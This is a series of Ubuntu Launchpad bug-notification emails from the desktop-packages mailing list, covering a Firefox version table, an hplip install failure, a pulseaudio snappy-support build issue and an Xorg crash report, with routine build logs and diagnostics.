Installed: 53.0.3+build1-0ubuntu0.16.04.2 Candidate: 53.0.3+build1-0ubuntu0.16.04.2 Version table: *** 53.0.3+build1-0ubuntu0.16.04.2 500 500 http://us.archive.ubuntu.com/ubuntu xenial-updates/main i386 Packages 500 http://security.ubuntu.com/ubuntu xenial-security/main i386 Packages 100 /var/lib/dpkg/status 45.0.2+build1-0ubuntu1 500 500 http://us.archive.ubuntu.com/ubuntu xenial/main i386 Packages To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/firefox/+bug/1697800/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1781986] Re: package ufw 0.35-5 failed to install/upgrade: los disparadores han entrado en bucle, abandonando
** Package changed: ufw (Ubuntu) => hplip (Ubuntu) ** Changed in: hplip (Ubuntu) Status: New => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to hplip in Ubuntu. https://bugs.launchpad.net/bugs/1781986 Title: package ufw 0.35-5 failed to install/upgrade: los disparadores han entrado en bucle, abandonando Status in hplip package in Ubuntu: Fix Released Bug description: I was trying to upgrade and this messages chows up. Leyendo lista de paquetes... Hecho Creando árbol de dependencias Leyendo la información de estado... Hecho 0 actualizados, 0 nuevos se instalarán, 0 para eliminar y 0 no actualizados. 9 no instalados del todo o eliminados. Se utilizarán 0 B de espacio de disco adicional después de esta operación. Configurando python3 (3.6.5-3ubuntu1) ... running python rtupdate hooks for python3.6... E: py3compile:183: cannot create directory /usr/share/hplip/ui5/__pycache__: FileNotFoundError(2, 'No such file or directory') [Errno 2] No such file or directory: '/usr/share/hplip/ui5/aboutdialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/aboutdialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/aligndialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/aligndialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/cleandialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/cleandialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/colorcaldialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/colorcaldialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/devicesetupdialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/devicesetupdialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/deviceuricombobox.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/devmgr5.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/devmgr5_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/devmgr_ext.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/fabgrouptable.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/fabnametable.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/fabwindow.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/fabwindow_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/faxsetupdialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/faxsetupdialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/filetable.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/firmwaredialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/firmwaredialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/infodialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/infodialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/linefeedcaldialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/linefeedcaldialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/loadpapergroupbox.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/makecopiesdialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/makecopiesdialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/mimetypesdialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/mimetypesdialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/nodevicesdialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/nodevicesdialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/plugindiagnose.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/plugindiagnose_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/plugindialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/plugindialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/pluginlicensedialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/pluginlicensedialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/pqdiagdialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/pqdiagdialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/printdialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/printdialog_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/printernamecombobox.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/printsettings_base.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/printsettingsdialog.py' [Errno 2] No such file or directory: '/usr/share/hplip/ui5/printsettingsdialog_base.py
[Desktop-packages] [Bug 1781428] Re: pulseaudio built with --enable-snappy but 'Enable Snappy support: no'
We can't just enable the patches any more because it will change how snaps that plugs 'pulseaudio' will work. Put concretely, the patches are meant to detect if the connecting process is a snap and if it is, unconditionally deny recording. Some snaps that 'plugs: [ pulseaudio ]' have legitimate use for audio recording, such as the chromium and firefox snaps for Google Meet, etc. If these patches all of a sudden were fixed, then snaps like firefox and chromium would no longer be able to record audio. While Ubuntu will end up patching pulseaudio in some way to support record mediation, it won't be with these patches. This is being discussed in https://forum.snapcraft.io/t/pulseaudio-recording/6361. If you have experience with pulseaudio and are interested in the upcoming changes, please keep an eye on the forum (and ideally participate in the conversation). Thanks! -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: pulseaudio built with --enable-snappy but 'Enable Snappy support: no' Status in pulseaudio package in Ubuntu: Incomplete Bug description: From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic- amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz: ... dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ... Enable Ubuntu trust store: no Enable Snappy support: no Enable Apparmor: yes At this point, the patch should probably be dropped, otherwise applications like chromium, etc will no longer be able to record. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1781428/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1781428] [NEW] pulseaudio built with --enable-snappy but 'Enable Snappy support: no'
Public bug reported: >From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic- amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz: ... dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ... Enable Ubuntu trust store: no Enable Snappy support: no Enable Apparmor: yes At this point, the patch should probably be dropped, otherwise applications like chromium, etc will no longer be able to record. ** Affects: pulseaudio (Ubuntu) Importance: Undecided Status: New ** Description changed: From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic- amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz: ... dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf - ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf + ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ... - Enable Ubuntu trust store: no - Enable Snappy support: no - Enable Apparmor: yes + Enable Ubuntu trust store: no + Enable Snappy support: no + Enable Apparmor: yes + + + At this point, the patch should probably be dropped, otherwise applications like chromium, etc will no longer be able to record. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: pulseaudio built with --enable-snappy but 'Enable Snappy support: no' Status in pulseaudio package in Ubuntu: New Bug description: From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic- amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz: ... dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/inc
[Desktop-packages] [Bug 1760104] Re: Xorg crashed with SIGSEGV
So, the pauses I am experiencing is likely due to simply the fact that the keyboards and mice are being removed then added back, which is a different issue than the crashes (which appear nvidia related). I will likely create a PR to only trigger the input subsystem on an as-needed base to reduce the annoying pauses we see during refreshes. Alan reported back on irc that the for loop did *not* trigger the crash which is good for snapd. Looking at the error reports, both are in the /usr/lib/xorg/Xorg binary: * https://errors.ubuntu.com/bucket/?id=/usr/lib/xorg/Xorg%3A11%3Axf86ReadInput%3AInputReady%3Aospoll_wait%3AInputThreadDoWork%3Astart_thread * https://errors.ubuntu.com/bucket/?id=/usr/lib/xorg/Xorg%3A11%3Amain_arena%3AInputReady%3Aospoll_wait%3AInputThreadDoWork%3Astart_thread which have numerous reports. I'm going to mark the 'snapd' task as invalid since while it may aggravate the issue, Xorg is clearly the problem. ** Changed in: snapd Status: New => Invalid ** Also affects: xorg-server (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to nvidia-graphics-drivers in Ubuntu. https://bugs.launchpad.net/bugs/1760104 Title: Xorg crashed with SIGSEGV Status in snapd: Invalid Status in nvidia-graphics-drivers package in Ubuntu: Confirmed Status in xorg-server package in Ubuntu: New Bug description: Installed a snap, immediately after I installed it, the machine froze and then x crashed. ProblemType: Crash DistroRelease: Ubuntu 18.04 Package: xserver-xorg-core 2:1.19.6-1ubuntu3 ProcVersionSignature: Ubuntu 4.15.0-13.14-generic 4.15.10 Uname: Linux 4.15.0-13-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair nvidia_modeset nvidia .proc.driver.nvidia.gpus..01.00.0: Error: [Errno 21] Is a directory: '/proc/driver/nvidia/gpus/:01:00.0' .proc.driver.nvidia.registry: Binary: "" .proc.driver.nvidia.version: NVRM version: NVIDIA UNIX x86_64 Kernel Module 390.42 Sat Mar 3 04:10:22 PST 2018 GCC version: gcc version 7.3.0 (Ubuntu 7.3.0-12ubuntu1) .proc.driver.nvidia.warnings.fbdev: Your system is not currently configured to drive a VGA console on the primary VGA device. The NVIDIA Linux graphics driver requires the use of a text-mode VGA console. Use of other console drivers including, but not limited to, vesafb, may result in corruption and stability problems, and is not supported. .tmp.unity_support_test.0: ApportVersion: 2.20.9-0ubuntu2 Architecture: amd64 CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins' CompositorRunning: compiz CompositorUnredirectDriverBlacklist: '(nouveau|Intel).*Mesa 8.0' CompositorUnredirectFSW: true Date: Fri Mar 30 14:15:35 2018 Disassembly: => 0x7f6b0008: Cannot access memory at address 0x7f6b0008 DistUpgraded: Fresh install DistroCodename: bionic DistroVariant: ubuntu ExecutablePath: /usr/lib/xorg/Xorg GraphicsCard: NVIDIA Corporation GM204M [GeForce GTX 980M] [10de:13d7] (rev a1) (prog-if 00 [VGA controller]) Subsystem: CLEVO/KAPOK Computer GM204M [GeForce GTX 980M] [1558:6541] InstallationDate: Installed on 2018-02-13 (44 days ago) InstallationMedia: Ubuntu 16.04.3 LTS "Xenial Xerus" - Release amd64 (20170801) MachineType: Notebook P65_P67RGRERA ProcCmdline: /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -background none -noreset -keeptty -verbose 3 ProcEnviron: ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-13-generic root=UUID=d6c2bf6a-9191-40b5-b3f5-ce493dcdec01 ro quiet splash vt.handoff=1 SegvAnalysis: Segfault happened at: 0x7f6b0008:Cannot access memory at address 0x7f6b0008 PC (0x7f6b0008) not located in a known VMA region (needed executable region)! Stack memory exhausted (SP below stack segment) SegvReason: executing unknown VMA Signal: 11 SourcePackage: nvidia-graphics-drivers StacktraceTop: () () () () start_thread (arg=0x7f6b3c98b700) at pthread_create.c:463 Title: Xorg crashed with SIGSEGV UpgradeStatus: No upgrade log present (probably fresh install) UserGroups: adm cdrom dip lpadmin plugdev sambashare sudo dmi.bios.date: 01/27/2016 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: 1.05.13 dmi.board.asset.tag: Tag 12345 dmi.board.name: P65_P67RGRERA dmi.board.vendor: Notebook dmi.board.version: Not Applicable dmi.chassis.asset.tag: No Asset Tag dmi.chassis.type: 10 dmi.chassis.vendor: Notebook dmi.chassis.version: N/A dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvr1.05.13:bd01/27/2016:svnNotebook:pnP65_P67RGRERA:pvrNotApplicable:rvnNotebook:rnP65_P67RGRERA:rvrNotApplicable:cvnNotebook:ct10:cvrN/A: dmi.product.family: Not Applicable dmi.product.name: P65_P67RGRERA dmi.product.version: Not Applicable dmi.sys.vendor: